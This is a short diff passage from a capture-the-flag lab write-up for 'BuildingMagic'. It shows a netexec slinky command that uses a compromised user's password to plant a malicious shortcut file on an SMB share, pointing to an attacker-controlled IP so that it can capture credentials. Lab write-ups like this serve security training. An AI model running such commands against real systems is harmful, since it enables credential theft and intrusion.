wolffangsecurity/CTF-Writeups/Hack Smarter Labs/BuildingMagic.md

 ```

 ## LNK Attack
+With h.potch having Write access I can use the slinky module to create a link/shortcut file that points to my IP
 ```
 netexec smb 10.1.213.153 -u h.potch -p newP@ssword2022 -M slinky -o SERVER=10.200.16.104 NAME=important
 [*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded